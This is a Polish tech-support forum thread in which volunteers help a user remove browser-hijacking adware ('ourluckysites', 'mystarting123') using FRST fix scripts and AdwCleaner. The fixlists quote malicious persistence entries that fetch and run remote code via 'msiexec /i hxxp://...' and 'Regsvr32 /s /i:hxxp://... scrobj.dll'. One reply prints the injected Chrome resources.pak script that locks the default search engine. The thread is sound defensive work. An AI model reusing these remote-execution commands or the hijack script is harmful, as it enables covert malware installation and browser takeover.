Ourluckysites - zmiana strony startowej i przeglądarek

[2artur2]

Komputer kolegi zainfekowany paskudztwem, co zmieniło strony główne przeglądarek i prawdopodobnie podmieniło oryginalne przeglądarki. Załączam pliki, bardzo proszę o pomoc w usunięciu szkodnika.

 

Artur

Addition.txt

FRST.txt

GMER.txt

Shortcut.txt

[Miszel03]

Naprawdę spory bałagan. Podmiana oryginalnych przeglądarek na fałszywe, szkodliwe usługi tworzące szereg infekcji adware, zarażone skróty, ale to nie wszystko i można by było wymieniać jeszcze, że "ho ho".

 

I Ty i Twój kolega, proszę przeczytajcie lekturę jak uniknąć podobnych sytuacji w przyszłości: KLIK.

 

1. Przez panel sterowania odinstaluj:

• Fałszywe oprogramowanie zabezpieczające i inne szkodniki: ScreenShot, update_server, VideoDownloadConverter Internet Explorer Toolbar, YAC(Yet Another Cleaner!).
• Sponsorzy instalacyjni / zbędniki: McAfee Security Scan Plus, Badanie mające na celu poprawę produktów HP DeskJet 2130 series.

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

CloseProcesses:
CreateRestorePoint:
S2 NPASRE; C:\Users\user\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] 
R2 SNARE; C:\Users\user\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] 
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2017-02-06] (Filseclab Corporation Limited)
S2 terana; C:\Users\user\AppData\Local\terana\terana.dll [909312 2017-05-31] () [brak podpisu cyfrowego] 
R2 VideoDownloadConverter_4zService; C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zbarsvc.exe [89448 2016-01-07] (Mindspark)
S2 3DM; C:\Users\user\AppData\Local\3DM\Kitty.dll [X] 
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] 
S2 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] 
S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [X]
S2 Kitty; C:\Users\user\AppData\Local\Kitty\Kitty.dll [X] 
S2 VNASRE; C:\Users\user\AppData\Local\VNASRE\Snare.dll [X] 
S2 WinSAPSvc; C:\Users\user\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] 
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) 
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) 
S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] 
S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] 
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] 
S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] 
S3 massfilter; system32\DRIVERS\massfilter.sys [X]
S3 ZTEusbmdm6k; system32\DRIVERS\ZTEusbmdm6k.sys [X]
S3 ZTEusbnet; system32\DRIVERS\ZTEusbnet.sys [X]
S3 ZTEusbnmea; system32\DRIVERS\ZTEusbnmea.sys [X]
S3 ZTEusbser6k; system32\DRIVERS\ZTEusbser6k.sys [X]
HKLM-x32\...\Run: [VideoDownloadConverter EPM Support] => C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zmedint.exe [11624 2016-01-07] (Mindspark)
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-409928750-3168526246-4082151387-1000\...\Run: [background_fault] => C:\Users\user\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) 
HKU\S-1-5-21-409928750-3168526246-4082151387-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj84NTlXMkExFkY1MkYdNTLSNkF3NWLSNdZXFjFxOWNSNF== /q 
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
Task: {60B10252-8078-4CB8-B709-3C01D8F11E67} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () 
Task: {76081B4A-A89D-4FE8-9C70-258B2F468250} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj84NTlXMkExFkY1MkYdNTLSNkF3NWLSNdZXFjFxOWNSNF== scrobj.dll
Task: {B2A4D69A-F4FC-4645-9075-7B61209D5D8B} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 
Task: {E3D3B381-A71B-4C01-AC74-5D29024991CD} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj84NTlXMkExFkY1MkYdNTLSNkF3NWLSNdZXFjFxOWNSNF== scrobj.dll
MSCONFIG\startupreg: Plus Internet => C:\Program Files (x86)\Plus Internet\PlusInternetChecker.exe
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms}
HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493744586&z=304290105b2752ed3e219d3g8z5tcc2m3z7zdw9m0b&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms}
HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493744586&z=304290105b2752ed3e219d3g8z5tcc2m3z7zdw9m0b&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms}
URLSearchHook: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 - (Brak nazwy) - {93a3111f-4f74-4ed8-895e-d9708497629e} - C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zSrcAs.dll (Mindspark)
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms}
SearchScopes: HKLM-x32 -> {cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8} URL = hxxp://int.search.tb.ask.com/search/GGmain.jhtml?p2=^HJ^xdm659^YYA^pl&si=CIa5saKxl8oCFcf7cgodt1MPSQ&ptb=5E9A0CA2-FEAA-4D35-BEDE-8753F18FA633&ind=2016010704&n=7829e1d0&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493744586&z=304290105b2752ed3e219d3g8z5tcc2m3z7zdw9m0b&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms}
SearchScopes: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 -> {cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8} URL = hxxp://int.search.tb.ask.com/search/GGmain.jhtml?p2=^HJ^xdm659^YYA^pl&si=CIa5saKxl8oCFcf7cgodt1MPSQ&ptb=5E9A0CA2-FEAA-4D35-BEDE-8753F18FA633&ind=2016010704&n=7829e1d0&psa=&st=sb&searchfor={searchTerms}
BHO-x32: Toolbar BHO -> {312f84fb-8970-4fd3-bddb-7012eac4afc9} -> C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zbar.dll [2015-12-11] (Mindspark)
BHO-x32: Search Assistant BHO -> {c547c6c2-561b-4169-a2a5-20ba771ca93b} -> C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zSrcAs.dll [2015-12-11] (Mindspark)
Toolbar: HKLM-x32 - VideoDownloadConverter - {48586425-6bb7-4f51-8dc6-38c88e3ebb58} - C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zbar.dll [2015-12-11] (Mindspark)
Toolbar: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 -> Brak nazwy - {48586425-6BB7-4F51-8DC6-38C88E3EBB58} - Brak pliku
ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948
HKU\S-1-5-21-409928750-3168526246-4082151387-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) 
DeleteKey: HKCU\Software\Eastness
DeleteKey: HKCU\Software\Google\Chrome\Extensions
DeleteKey: HKCU\Software\Firefox
DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Eastness
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions
C:\Program Files (x86)\BiaoJi
C:\Program Files (x86)\Eastness
C:\Program Files (x86)\Elex-tech
C:\Program Files (x86)\Firefox
C:\Program Files (x86)\MIO
C:\Program Files (x86)\ScreenShot
C:\Program Files (x86)\VideoDownloadConverter_4z
C:\ProgramData\BIT
C:\ProgramData\Software
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\user\AppData\Local\3DM
C:\Users\user\AppData\Local\background_fault
C:\Users\user\AppData\Local\Firefox
C:\Users\user\AppData\Local\NPASRE
C:\Users\user\AppData\Local\SNARE
C:\Users\user\AppData\Local\terana
C:\Users\user\AppData\Local\VNASRE
C:\Users\user\AppData\Roaming\go00001.bak
C:\Users\user\AppData\Roaming\Firefox
C:\Users\user\AppData\Roaming\SPTemp
C:\Users\user\AppData\Roaming\WinSAPSvc
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
C:\Users\Public\Documents\report.dat
C:\Users\Public\Documents\temp.dat
C:\Windows\psgo
C:\Windows\SysWOW64\00
C:\Windows\SysWOW64\11
C:\Windows\SysWOW64\33
C:\Windows\SysWOW64\55
C:\Windows\SysWOW64\1111
CMD: netsh advfirewall reset
Hosts:
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Z klawiatury CTRL+S, by zapisać zmiany. Wyłącz COMODO na czas operacji, by nie zablokował zmian. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.

 

3. Kompleksowo wymień profile w przeglądarce Google Chrome oraz Mozilla FireFox.

• Otwórz Google Chrome następnie: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > Załóż czysty profil > ponownie wejdź do sekcji Osoby i skasuj wszystkie stare profile.
• Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj.

Utracisz wszystko z tych przeglądarek, więc ewentualnie możesz wyeksportować zakładki i ważne linki.

Ważne, abyś którąś z powyższych przeglądarek ustawił jako domyślną - inaczej nie cofnie się modyfikacja infekcji.

 

4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

eastness;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.

 

5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

[2artur2]

Naprawdę sporo tego. Zrobię to wszystko i dam znać. Dziękuję.

[Miszel03]

To nie jest w cale tak dużo, jak mogłoby się wydawać. Każdy krok zajmie Ci ok. 3-5 minut.

[2artur2]

Wykonałem wszystkie kroki, załączam logi. Chyba jest ok, ale zauważyłem wyszukiwarkę w chrome (mystarting123), której nie można usunąć.

Addition.txt

Fixlog.txt

FRST.txt

SearchReg.txt

Shortcut.txt

[picasso]

Miszel03 prowadzi temat, więc wtrącam się tutaj pod innym kątem:

 

Chyba jest ok, ale zauważyłem wyszukiwarkę w chrome (mystarting123), której nie można usunąć.

Jeżeli z menu ustawiłeś Google jako domyślną, a wyszukiwarka adware nadal wraca i się ustawia samoczynnie jako domyślna, to być może jest tu jakaś niewidoczna na poziomie FRST blokada. Ostatnio to notowalne zachowanie w kilku tematach, pomimo że teoretycznie polityki Google nie zostały wykryte. Na wszelki wypadek proszę skopiuj na Pulpit następujące foldery (o ile są):

 

C:\Windows\System32\GroupPolicy

C:\Windows\System32\GroupPolicyUsers

C:\Windows\SysWOW64\GroupPolicy

C:\Windows\SysWOW64\GroupPolicyUsers

 

Spakuj do ZIP, shostuj gdzieś i podaj link do paczki.

[Miszel03]

Po za tym o co prosi picasso, ja poproszę mimo Twojego stwierdzenia o wykonaniu wszystkich kroków o potwierdzenie wykonania punktu 1. Wygląda na to, że ani jeden program nie został odinstalowany. Jeśli jest z tym problem zrób to za pomocą Program Install and Uninstall Troubleshooter.

[2artur2]

Moja wina - zapomniałem o punkcie 1. Zdeinstalowałem teraz te programy. Jedynie VideoDownloadConverter Internet Explorer Toolbar nie daje się usunąć, ale to tylko wpis a nie ma takiego katalogu.

Co do PolicyGroup, są te katalogi, ale wszystkie są puste, więc nic nie mogę załączyć.

Tej wyszukiwarki "mystarting123" nie daje się usunąć z chrome - nie ma nawet "krzyżyka" do jej usunięcia, jak w innych wyszukiwarkach. Nie można też ustawić innej wyszukiwarki. Wykonałem reset ustawień chrome ale bez rezultatu. W Firefoxie jest ok.

[Miszel03]

OK, w takim razie proszę o nowy zestaw raportów FRST, bo deinstsalacje to duże zmiany w systemie.

[picasso]

Co do PolicyGroup, są te katalogi, ale wszystkie są puste, więc nic nie mogę załączyć.

 

Tej wyszukiwarki "mystarting123" nie daje się usunąć z chrome - nie ma nawet "krzyżyka" do jej usunięcia, jak w innych wyszukiwarkach. Nie można też ustawić innej wyszukiwarki. Wykonałem reset ustawień chrome ale bez rezultatu. W Firefoxie jest ok.

Jeśli na pewno te katalogi są puste, to dostarcz więcej danych do analizy.

 

Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

Folder: C:\Windows\PolicyDefinitions
Zip: C:\Program Files (x86)\Google;C:\Users\user\AppData\Local\Google

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. Na Pulpicie powstał też plik data_czas.zip. Shostuj go gdzieś i podaj link do paczki.

[2artur2]

Załączam logi FRST po usunięciu wpisu z programu VideoDownloadConverter Internet Explorer Toolbar w Dodaj/Usuń programy oraz zdeinstalowaniu Chrome wraz z katalogami Google w Local i Roaming. Spróbuję jeszcze zainstalować chrome zupełnie od nowa.

Addition.txt

FRST.txt

Shortcut.txt

[picasso]

Następnym razem proszę nie podejmuj się akcji spoza zadanej puli działań, bo występują utrudnienia. Niestety odinstalowałeś Google Chrome uniemożliwiając mi diagnozę usterki w Chrome. Reinstalacja Chrome zostałaby podana pewnie potem (i jestem przekonana, że po niej wyszukiwarka nie wraca). Ale nie o to tu mi chodziło. Informacja gdzie konkretnie siedzi ta blokada jest mi potrzebna, bo może uda się to dodać do detekcji narzędzi.

 

Są punkty Przywracania systemu, czyli kopie poprzednich katalogów Google powinno się dać wyłuskać do analizy. Uruchom ShadowExplorer, wybierz datę odpowiadającą temu punktowi gdy Chrome jeszcze było w systemie:

 

21-06-2017 08:42:16 Restore Point Created by FRST

 

Przekopiuj poniższe foldery na Pulpit:

 

C:\Program Files (x86)\Google

C:\Users\user\AppData\Local\Google

C:\Users\user\AppData\Roaming\Google

 

Spakuj do ZIP, shostuj gdzieś i podaj link.

[2artur2]

OK, chciałem przyspieszyć i dlatego takie działania. Po ponownej instalacji Chrome wydaje się, że komputer jest zdrowy. Podaję link do wspomnianych folderów wyciągniętych z Restore Point (454MB):

 

https://drive.google.com/open?id=0B4-riz4oYd02ZXU5NnZhQU9lY3M

[picasso]

Dzięki za pliki. Wszystko jasne. To nie nowy trik, tylko tu użyty w nowym kontekście (blokada wyszukiwarki). Adware zmodyfikowało globalny plik zasobów C:\Program files (x86)\Google\Chrome\Application\[wersja]\resources.pak wstawiając skrypt ustawiający "domyślną wyszukiwarkę" w sposób permanentny:
 

//Yrrehs is here
var default_search_engine_name = 'mystarting123',default_search_engine_keywords = 'mystarting123',url = 'http://www.mystarting123.com/search/index.php?z=2edce67d80ffd74f08dc489gbz5tfw3qfw9g8o4z2q&q=%s';var index = (this.defaultsList_.dataModel.length + this.othersList_.dataModel.length - 1);var alreay_exists = false;for (var i = 0; i < this.defaultsList_.dataModel.length; ++i) {if (this.defaultsList_.dataModel.array_[i].name === default_search_engine_name) {index = i;alreay_exists = true;break;}}for (var i = 0; i < this.othersList_.dataModel.length && !alreay_exists; ++i) {if (this.othersList_.dataModel.array_[i].name === default_search_engine_name) {index = i + this.defaultsList_.dataModel.length;alreay_exists = true;break;}}if (alreay_exists) {chrome.send('managerSetDefaultSearchEngine', [index]);} else {chrome.send('editSearchEngine', [String(-1)]);chrome.send('searchEngineEditCompleted', [default_search_engine_name, default_search_engine_keywords, url]);chrome.send('managerSetDefaultSearchEngine', [index]);}},
  };

.

 

Ta modyfikacja jest niewykrywalna przez FRST i nie będzie. Już dawno temu zgłaszałam adware modyfikujące resources.pak i niestety nie było możliwe dodać detekcję.

 

By to wyleczyć, albo szuka się poprzedniej poprawnej kopii pliku (np. via Shadow Explorer), albo reinstaluje przeglądarkę (tu już zrobione). Czyli nic więcej nie trzeba tu robić pod tym kątem, a ja wszystko już wiem.

[Miszel03]

Widzisz - na tym forum czasem i userzy proszący o pomoc mogą pomóc innym. Skąd przecież musimy brać dane
 
Wszystko pomyślnie wykonane, tym samym wszystko zostało wyczyszczone.
Małe poprawki kończące oraz skan potwierdzający wynik dezynfekcji.
 
1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:
 

DeleteKey: HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\e04bcfda_0
DeleteValue: HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Eastness\Application\chrome.exe
Toolbar: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Brak pliku
FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku]
DeleteQuarantine:

 
Z klawiatury CTRL+S, by zapisać zmiany. Wyłącz COMODO na czas operacji, by nie zablokował zmian. Następnie w oknie FRST klik w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.
 
2. Uruchom AdwCleaner. Na razie wybierz tylko opcję Szukaj (nie stosuj jeszcze Oczyść) i dostarcz log z folderu C:\AdwCleaner.

[2artur2]

Tak sądziłem, że mogę być źródłem informacji

Dziękuję bardzo za pomoc. Załączyłem logi z FRST i AdwCleaner. AdWCleaner wykrył 138 zagrożeń.

Fixlog.txt

AdwCleanerS0.txt

[Miszel03]

Zagrożenie wykryte przez AdwCleaner daj do kasacji, a następnie podsumuj obecny stan systemu.

[2artur2]

AdwCleaner skasował wykryte problemy, dodatkowo zaktualizowałem Firefoxa. Według mnie system działa prawidłowo. Jeszcze raz bardzo dziękuję za pomoc i poświęcony czas.

 

Artur

[Miszel03]

W takim razie kończymy.

 

Zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne / Windows.

Zamykam.

[picasso]

Informacyjnie: udało mi się uzyskać w FRST detekcję modyfikacji resources.pak. W przypadku szkodliwej domyślnej wyszukiwarki pojawi się następujący komunikat:

 

CHR res: Infected resources.pak (search_engine). Reinstall Chrome.